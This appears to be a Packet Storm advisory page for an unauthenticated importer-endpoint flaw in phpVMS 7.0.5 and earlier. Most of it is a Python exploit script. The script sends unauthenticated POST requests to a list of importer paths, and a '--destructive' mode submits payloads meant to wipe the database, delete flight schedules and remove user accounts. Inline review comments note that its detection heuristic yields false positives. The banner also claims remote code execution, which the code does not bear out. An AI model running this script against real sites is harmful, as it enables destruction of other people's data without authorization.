
📄 phpVMS 7.0.5 Unauthenticated Import Endpoint Bypass

🗓️ 09 Jun 2026 00:00:00 | Reported by indoushka | Type: packetstorm
🔗 packetstorm.news | 👁 12 Views

phpVMS versions up to and including 7.0.5 expose an import endpoint that can be reached without authentication, enabling destructive actions. The PoC below lists phpVMS 7.0.6+ as patched.

==================================================================================================================================
    | # Title     : phpVMS ≤ 7.0.5 Unauthenticated Import Endpoint Bypass                                                            |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://phpvms.net/                                                                                              |
    ==================================================================================================================================
    
    [+] Summary    : This script is an active vulnerability-testing and exploitation tool targeting phpVMS ≤ 7.0.5.
                     It scans multiple importer-related endpoints, sends POST requests that simulate or trigger destructive
                     operations (such as import, delete, and database-wipe actions), and classifies a target as vulnerable
                     based on HTTP status codes, response length, and keyword indicators. The scan phase itself issues these
                     POST requests, so it is not a read-only check, and its verdict is heuristic rather than proof of exposure.
    
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    """
    Affected: phpVMS ≤ 7.0.5
    Patched: phpVMS 7.0.6+
    """
    
    import requests
    import sys
    import time
    import argparse
    from urllib.parse import urljoin
    
    # Optional colour output: use colorama when it is installed, otherwise fall
    # back to stand-in classes whose colour codes are empty strings.
    try:
        from colorama import init, Fore, Style
        init(autoreset=True)
    except ImportError:
        COLORS = False

        class Fore:
            # Empty strings so formatted output carries no escape codes.
            RED = ''
            GREEN = ''
            YELLOW = ''
            CYAN = ''

        class Style:
            RESET_ALL = ''
    else:
        COLORS = True
    
    def colorize(text, color):
        """Return *text* wrapped in *color* plus a reset code, or unchanged when colour is off."""
        return f"{color}{text}{Style.RESET_ALL}" if COLORS else text
    
    def banner():
        """Print the script's title box in red.

        The box labels the issue "RCE/Destructive"; the requests made elsewhere in
        this script only submit importer form actions.
        """
        title_box = """
    ╔══════════════════════════════════════════════════════════════╗
    ║         CVE-2026-42569 - phpVMS RCE/Destructive              ║
    ║          Unauthenticated Legacy Importer Access              ║
    ║                     By indoushka                             ║
    ╚══════════════════════════════════════════════════════════════╝
    """
        coloured = colorize(title_box, Fore.RED)
        print(coloured)
    
    def test_endpoint(target, endpoint, timeout=10, verify_ssl=False):
        """Probe one candidate importer URL and guess whether it answers without authentication.

        Sends one GET and three POSTs to ``target`` + ``endpoint`` and flags the
        endpoint when a response has one of the listed status codes and either
        contains a keyword indicator or has a body longer than 200 characters.

        Args:
            target: Base URL of the site.
            endpoint: Path appended to the base URL.
            timeout: Per-request timeout in seconds, passed to requests.
            verify_ssl: Passed to requests as ``verify``; the default False
                disables TLS certificate validation.

        Returns:
            A ``(vulnerable, results)`` tuple: a bool, and a list of dicts with
            the keys ``payload``, ``status`` and ``indicators``.

        NOTE(review): the three POST bodies name import/delete/clear actions, so
        this probe is not read-only. What a server does with them is not visible
        from this file.
        """
        url = urljoin(target.rstrip('/') + '/', endpoint.lstrip('/'))
        
        print(colorize(f"[*] Testing: {url}", Fore.YELLOW))
        
        # Fixed, self-identifying User-Agent: requests sent by this function can
        # be located in web access logs by searching for this literal string.
        headers = {
            "User-Agent": "Mozilla/5.0 (CVE-2026-42569 Scanner)",
            "Content-Type": "application/x-www-form-urlencoded"
        }
    
        # One plain GET followed by three form POSTs; no session cookie or
        # credential is attached to any of them.
        test_payloads = [
            {
                "name": "basic_access",
                "data": {},
                "method": "GET"
            },
            {
                "name": "import_trigger",
                "data": {
                    "action": "import",
                    "type": "full",
                    "confirm": "true"
                },
                "method": "POST"
            },
            {
                "name": "delete_trigger",
                "data": {
                    "action": "delete_all",
                    "confirm": "yes"
                },
                "method": "POST"
            },
            {
                "name": "truncate_schedules",
                "data": {
                    "action": "clear_schedules",
                    "_token": "bypass"
                },
                "method": "POST"
            }
        ]
       
        vulnerable = False
        results = []
        
        for payload in test_payloads:
            try:
                # allow_redirects=True means r is normally the response at the
                # end of any redirect chain, not the first hop.
                if payload["method"] == "GET":
                    r = requests.get(url, headers=headers, timeout=timeout, 
                                    verify=verify_ssl, allow_redirects=True)
                else:
                    r = requests.post(url, headers=headers, data=payload["data"],
                                     timeout=timeout, verify=verify_ssl, 
                                     allow_redirects=True)
    
                # Case-insensitive substring checks on the body. These are generic
                # words that can also appear on unrelated pages.
                indicators = [
                    "success" in r.text.lower(),
                    "imported" in r.text.lower(),
                    "deleted" in r.text.lower(),
                    "truncat" in r.text.lower(),
                    "completed" in r.text.lower(),
                    "database" in r.text.lower() and ("clear" in r.text.lower() or "wipe" in r.text.lower())
                ]
    
                if r.status_code in [200, 301, 302, 307, 308]:
                    # NOTE(review): the length test alone is enough to flag the
                    # endpoint, so any 200 page over 200 characters (a login form,
                    # a styled error page) is reported as vulnerable. Treat a
                    # positive verdict as a lead to verify, not as confirmation.
                    if any(indicators) or len(r.text) > 200:
                        vulnerable = True
                        results.append({
                            "payload": payload["name"],
                            "status": r.status_code,
                            # indicators holds booleans, so this stores up to
                            # three True values rather than the matched keywords.
                            "indicators": [ind for ind in indicators if ind][:3]
                        })
                        
                elif r.status_code == 403:
    
                    print(colorize(f"    [!] Endpoint exists but returned 403 (may still be vulnerable in older versions)", Fore.YELLOW))
                    
            # Request failures are reported on stdout and the loop moves on to the
            # next payload; nothing is raised to the caller.
            except requests.exceptions.ConnectionError:
                print(colorize(f"    [-] Connection error - target may be down", Fore.RED))
            except requests.exceptions.Timeout:
                print(colorize(f"    [-] Timeout on {url}", Fore.RED))
            except Exception as e:
                print(colorize(f"    [-] Error: {str(e)[:50]}", Fore.RED))
        
        return vulnerable, results
    
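    def attempt_exploit(target, endpoint, destructive=False, timeout=10):
        """Send the script's three data-modifying importer requests to one endpoint.

        Nothing is sent unless ``destructive`` is true and the operator types the
        confirmation phrase at the prompt.

        Args:
            target: Base URL of the site.
            endpoint: Path appended to the base URL.
            destructive: Must be True for any request to be sent.
            timeout: Per-request timeout in seconds, passed to requests.

        Returns:
            True if at least one request came back with HTTP 200 or 302, else
            False. A 200/302 only shows the request was accepted at the HTTP
            level; it does not show that any data changed.
        """
        # Safety interlock: the flag used to gate only the confirmation prompt, so
        # a call with destructive=False still sent every request below. Refuse
        # outright instead.
        if not destructive:
            return False

        print(colorize("\n[!!!] DESTRUCTIVE MODE ENABLED - THIS WILL DAMAGE DATA [!!!]", Fore.RED))
        confirm = input(colorize("Type 'CONFIRM_DESTROY' to continue: ", Fore.RED))
        if confirm != "CONFIRM_DESTROY":
            print(colorize("[*] Destructive operation cancelled.", Fore.YELLOW))
            return False
        
        url = urljoin(target.rstrip('/') + '/', endpoint.lstrip('/'))
    
        dangerous_payloads = [
            {
                "name": "FULL_DATABASE_WIPE",
                "data": {
                    "action": "full_import",
                    "wipe_first": "true",
                    "confirm": "yes",
                    "force": "1"
                },
                "description": "Attempts to wipe entire database"
            },
            {
                "name": "DELETE_ALL_FLIGHTS",
                "data": {
                    "action": "import_schedules",
                    "clear_existing": "on",
                    "submit": "Import"
                },
                "description": "Deletes all flight schedules"
            },
            {
                "name": "TRUNCATE_USERS",
                "data": {
                    "action": "import_users",
                    "replace": "all",
                    "_method": "DELETE"
                },
                "description": "Removes user accounts"
            }
        ]
        
        # Unlike the scan phase, this uses a generic browser User-Agent, so log
        # review should key on the request path and POST body, not the agent.
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
            "Content-Type": "application/x-www-form-urlencoded",
            "X-Requested-With": "XMLHttpRequest"
        }
        
        success_count = 0
        for payload in dangerous_payloads:
            print(colorize(f"\n[*] Attempting: {payload['name']}", Fore.MAGENTA))
            print(colorize(f"    Description: {payload['description']}", Fore.CYAN))
            
            try:
                # verify=False: TLS certificate validation is disabled here.
                r = requests.post(url, headers=headers, data=payload["data"],
                                timeout=timeout, verify=False, allow_redirects=True)
                
                if r.status_code in [200, 302]:
                    print(colorize(f"    [+] Payload delivered - Check target for damage", Fore.RED))
                    success_count += 1
                else:
                    print(colorize(f"    [-] Failed with status: {r.status_code}", Fore.YELLOW))
                    
            except Exception as e:
                # Failures are reported and the loop continues with the next request.
                print(colorize(f"    [-] Error: {str(e)[:50]}", Fore.RED))
        
        return success_count > 0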
    
    def scan_common_endpoints(target):
        """Run test_endpoint() over a fixed list of importer-style paths.

        The paths below are the complete set this scan requests, which also makes
        them the paths to look for when reviewing access logs for this tool.

        Returns:
            A list of ``{"endpoint": path, "results": [...]}`` dicts, one per path
            that test_endpoint() flagged.
        """
        candidate_paths = [
            "/importer",
            "/importer/index",
            "/importer/index.php",
            "/import",
            "/import/index",
            "/legacy/importer",
            "/admin/importer",
            "/install/importer",
            "/public/importer",
            "/index.php/importer",
            "/index.php/import",
            "/?module=importer",
            "/index.php?module=import",
            "/legacy/import",
            "/tools/importer",
            "/maintenance/import",
        ]

        flagged = []

        for path in candidate_paths:
            is_flagged, findings = test_endpoint(target, path)
            if not is_flagged:
                print(colorize(f"[-] Not vulnerable: {path}", Fore.RED))
                continue

            flagged.append({"endpoint": path, "results": findings})
            print(colorize(f"\n[+] VULNERABLE: {path}", Fore.GREEN))
            for finding in findings:
                print(colorize(f"    - Payload '{finding['payload']}' triggered (Status: {finding['status']})", Fore.GREEN))

        return flagged
    
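    def check_version(target):
        """Try to read a phpVMS version string from the target's landing page.

        Fetches ``target`` once and looks for "phpVMS" followed by an ``x.y.z``
        number in the body. It also reports when the ``X-Powered-By`` header
        mentions phpVMS.

        Returns:
            The version string (e.g. ``"7.0.5"``) when one is found, else None.
            None means only that no version string was found in the page; it says
            nothing about patch status.
        """
        import re

        print(colorize("\n[*] Attempting version detection...", Fore.CYAN))
        
        try:
            # verify=False: TLS certificate validation is disabled for this request.
            r = requests.get(target, timeout=10, verify=False)
    
            # The substring test is case-sensitive although the regex is not, so a
            # page that only says "phpvms" skips this branch.
            if "phpVMS" in r.text:
                version_match = re.search(r'phpVMS[^\d]*(\d+\.\d+\.\d+)', r.text, re.I)
                if version_match:
                    version = version_match.group(1)
                    print(colorize(f"[+] Detected phpVMS version: {version}", Fore.CYAN))
                    # Compare as integer tuples. As plain strings "7.0.10" sorts
                    # before "7.0.5", which would report a patched release as
                    # vulnerable.
                    version_parts = tuple(int(part) for part in version.split('.'))
                    if version_parts <= (7, 0, 5):
                        print(colorize(f"[!] Version {version} is VULNERABLE!", Fore.RED))
                    else:
                        print(colorize(f"[*] Version {version} appears patched", Fore.GREEN))
                    return version
            if 'X-Powered-By' in r.headers:
                if 'phpVMS' in r.headers['X-Powered-By']:
                    print(colorize(f"[+] Header reveals phpVMS installation", Fore.CYAN))
        
        except Exception as e:
            # Best effort: any failure is reported and treated as "unknown".
            print(colorize(f"[-] Version detection failed: {e}", Fore.YELLOW))
        
        return None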
    
    def exploit(target, destructive=False, scan_all=False):
        """Drive the whole run: version check, endpoint probing, report, optional follow-up.

        Args:
            target: Base URL of the site.
            destructive: When True, attempt_exploit() is called for every flagged
                endpoint after the report is printed.
            scan_all: When True, probe the full path list via
                scan_common_endpoints(); otherwise probe three paths.

        Returns:
            None. All results are printed.
        """
        print(colorize(f"[*] Targeting: {target}", Fore.CYAN))
    
        version = check_version(target)
        # NOTE(review): this is a string comparison, so e.g. "7.0.10" compares as
        # less than "7.0.5" and produces no warning. The warning is advisory
        # either way: the run continues whatever the detected version.
        if version and version > "7.0.5":
            print(colorize(f"[!] Target appears patched. Proceeding with caution...", Fore.YELLOW))
    
        if scan_all:
            print(colorize("\n[*] Running full endpoint scan...", Fore.CYAN))
            vulnerable_endpoints = scan_common_endpoints(target)
        else:
            print(colorize("\n[*] Testing common endpoints...", Fore.CYAN))
            # Default mode probes only these three paths.
            endpoints = ["/importer", "/import", "/legacy/importer"]
            vulnerable_endpoints = []
            for endpoint in endpoints:
                vulnerable, results = test_endpoint(target, endpoint)
                if vulnerable:
                    vulnerable_endpoints.append({"endpoint": endpoint, "results": results})
        # The verdict printed below is only as reliable as test_endpoint()'s
        # status/keyword/length heuristic.
        if vulnerable_endpoints:
            print(colorize("\n" + "="*60, Fore.RED))
            print(colorize("[!!!] SYSTEM IS VULNERABLE TO CVE-2026-42569 [!!!]", Fore.RED))
            print(colorize("="*60, Fore.RED))
            
            for vuln in vulnerable_endpoints:
                print(colorize(f"\n[+] Vulnerable endpoint: {vuln['endpoint']}", Fore.RED))
                for result in vuln['results']:
                    print(colorize(f"    - {result['payload']} payload succeeded", Fore.YELLOW))
            
            print(colorize("\n" + "="*60, Fore.RED))
            print(colorize("IMPACT: Unauthenticated database wipe/delete possible", Fore.RED))
            print(colorize("="*60, Fore.RED))
            # vulnerable_endpoints is already known to be non-empty in this
            # branch, so only the destructive flag decides here.
            if destructive and vulnerable_endpoints:
                print(colorize("\n[*] Preparing exploitation sequence...", Fore.MAGENTA))
                for vuln in vulnerable_endpoints:
                    print(colorize(f"\n[*] Exploiting: {vuln['endpoint']}", Fore.MAGENTA))
                    attempt_exploit(target, vuln['endpoint'], destructive=True)
                    
        else:
            print(colorize("\n[*] No vulnerable endpoints detected", Fore.GREEN))
            print(colorize("[*] Target may be patched or configured securely", Fore.GREEN))
    
    def main():
        """Parse the command line, run exploit() on the target, then print a closing notice.

        NOTE(review): ``--timeout`` is parsed but never passed on to exploit(), so
        the option has no effect on the requests that are made.
        """
        banner()

        cli = argparse.ArgumentParser(
            description='CVE-2026-42569 - phpVMS Unauthenticated Import Endpoint Bypass',
            epilog='Example: python3 CVE-2026-42569.py http://target.com --destructive'
        )
        cli.add_argument('target', help='Target URL (e.g., http://target.com)')
        cli.add_argument('--destructive', '-d', action='store_true',
                         help='Enable destructive exploitation (WILL DAMAGE DATA)')
        cli.add_argument('--scan-all', '-s', action='store_true',
                         help='Scan all common endpoint variations')
        cli.add_argument('--timeout', '-t', type=int, default=10,
                         help='Request timeout in seconds (default: 10)')

        opts = cli.parse_args()

        # A bare host name is treated as plain HTTP.
        has_scheme = opts.target.startswith(('http://', 'https://'))
        if not has_scheme:
            opts.target = 'http://' + opts.target

        try:
            exploit(opts.target, opts.destructive, opts.scan_all)
        except KeyboardInterrupt:
            print(colorize("\n[*] Scan interrupted by user", Fore.YELLOW))
            sys.exit(0)

        rule = "=" * 60
        print(colorize("\n" + rule, Fore.RED))
        print(colorize("REMINDER: This vulnerability can cause COMPLETE DATABASE DELETION", Fore.RED))
        print(colorize("Use responsibly and only on authorized targets.", Fore.RED))
        print(colorize(rule, Fore.RED))
    
    if __name__ == "__main__":
        # With no arguments, print a short usage summary and exit with status 1
        # instead of letting argparse report the missing target.
        if len(sys.argv) == 1:
            usage_lines = (
                "Usage: python3 CVE-2026-42569.py <target> [options]",
                "\nBasic scan:",
                "  python3 CVE-2026-42569.py http://phpvms.example.com",
                "\nFull scan:",
                "  python3 CVE-2026-42569.py http://phpvms.example.com --scan-all",
                "\nDestructive mode (WILL DAMAGE DATA):",
                "  python3 CVE-2026-42569.py http://phpvms.example.com --destructive",
                "\nOptions:",
                "  --destructive, -d    Enable destructive exploitation",
                "  --scan-all, -s       Scan all endpoint variations",
                "  --timeout, -t        Request timeout in seconds",
            )
            for usage_line in usage_lines:
                print(usage_line)
            sys.exit(1)

        main()
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================


09 Jun 2026 00:00 (current)
Vulners AI Score: 5.4 (Medium risk)
CVSS 3.1: 9.4
EPSS: 0.02105
SSVC
12